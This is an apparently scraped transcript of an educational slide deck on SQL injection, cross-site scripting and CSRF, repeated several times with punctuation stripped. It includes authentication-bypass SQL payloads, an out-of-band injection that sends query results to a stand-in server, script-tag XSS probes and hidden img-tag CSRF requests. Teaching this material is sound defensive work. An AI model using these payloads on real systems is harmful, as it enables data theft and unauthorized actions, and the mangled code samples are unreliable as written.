vulnerabilities in web applications
TRANSCRIPT
Vulnerabilities In Web Applications
What is a Vulnerability
bull Vulnerability is a weakness which allows an attacker to reduce a systems
information assurance
bull It comprises of three elements
1 Flaw in the System
2 Attacker access to flaw
3 Capability of attacker to exploit flaw
bull Vulnerability Life Cycle
1 Vulnerability is discovered
2 Vulnerability is known to vendor
3 Patch is published
4 Patch is installed in affected systems
Prevailing Vulnerabilities in Web Applications
1 Injection flaws such as SQL LDAP injection
2 Broken Authentication and Session Management
3 Cross Site Scripting
4 Insecure Direct Object References
5 Security Misconfiguration
6 Sensitive Data Exposure
7 Missing Function Level Access Control
8 Cross Site Request Forgery
9 Using components with known Vulnerabilities
10 Invalidated Redirects and Forwards
Agenda
bull SQL Injection
bull Cross Site Scripting ( XSS)
bull Cross Site Request Forgery (CSRF)
SQL Injection
What is SQL Injection
bull An SQL Injection is basically inserting or injecting a SQL query via the data input
bull Using this Technique malicious users can inject SQL commands into SQL
statement via web page input
bull SQL queries written by programmers make use of user supplied data
bull Attackers make use of above feature and try to exploit application
What harm does SQL Injection do
bull Read data from database
bull Execute administrator operations like Delete Tables
bull Modify data in database
General Application Behavior
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
What is a Vulnerability
bull Vulnerability is a weakness which allows an attacker to reduce a systems
information assurance
bull It comprises of three elements
1 Flaw in the System
2 Attacker access to flaw
3 Capability of attacker to exploit flaw
bull Vulnerability Life Cycle
1 Vulnerability is discovered
2 Vulnerability is known to vendor
3 Patch is published
4 Patch is installed in affected systems
Prevailing Vulnerabilities in Web Applications
1 Injection flaws such as SQL LDAP injection
2 Broken Authentication and Session Management
3 Cross Site Scripting
4 Insecure Direct Object References
5 Security Misconfiguration
6 Sensitive Data Exposure
7 Missing Function Level Access Control
8 Cross Site Request Forgery
9 Using components with known Vulnerabilities
10 Invalidated Redirects and Forwards
Agenda
bull SQL Injection
bull Cross Site Scripting ( XSS)
bull Cross Site Request Forgery (CSRF)
SQL Injection
What is SQL Injection
bull An SQL Injection is basically inserting or injecting a SQL query via the data input
bull Using this Technique malicious users can inject SQL commands into SQL
statement via web page input
bull SQL queries written by programmers make use of user supplied data
bull Attackers make use of above feature and try to exploit application
What harm does SQL Injection do
bull Read data from database
bull Execute administrator operations like Delete Tables
bull Modify data in database
General Application Behavior
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Prevailing Vulnerabilities in Web Applications
1 Injection flaws such as SQL LDAP injection
2 Broken Authentication and Session Management
3 Cross Site Scripting
4 Insecure Direct Object References
5 Security Misconfiguration
6 Sensitive Data Exposure
7 Missing Function Level Access Control
8 Cross Site Request Forgery
9 Using components with known Vulnerabilities
10 Invalidated Redirects and Forwards
Agenda
bull SQL Injection
bull Cross Site Scripting ( XSS)
bull Cross Site Request Forgery (CSRF)
SQL Injection
What is SQL Injection
bull An SQL Injection is basically inserting or injecting a SQL query via the data input
bull Using this Technique malicious users can inject SQL commands into SQL
statement via web page input
bull SQL queries written by programmers make use of user supplied data
bull Attackers make use of above feature and try to exploit application
What harm does SQL Injection do
bull Read data from database
bull Execute administrator operations like Delete Tables
bull Modify data in database
General Application Behavior
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Agenda
bull SQL Injection
bull Cross Site Scripting ( XSS)
bull Cross Site Request Forgery (CSRF)
SQL Injection
What is SQL Injection
bull An SQL Injection is basically inserting or injecting a SQL query via the data input
bull Using this Technique malicious users can inject SQL commands into SQL
statement via web page input
bull SQL queries written by programmers make use of user supplied data
bull Attackers make use of above feature and try to exploit application
What harm does SQL Injection do
bull Read data from database
bull Execute administrator operations like Delete Tables
bull Modify data in database
General Application Behavior
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
SQL Injection
What is SQL Injection
bull An SQL Injection is basically inserting or injecting a SQL query via the data input
bull Using this Technique malicious users can inject SQL commands into SQL
statement via web page input
bull SQL queries written by programmers make use of user supplied data
bull Attackers make use of above feature and try to exploit application
What harm does SQL Injection do
bull Read data from database
bull Execute administrator operations like Delete Tables
bull Modify data in database
General Application Behavior
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
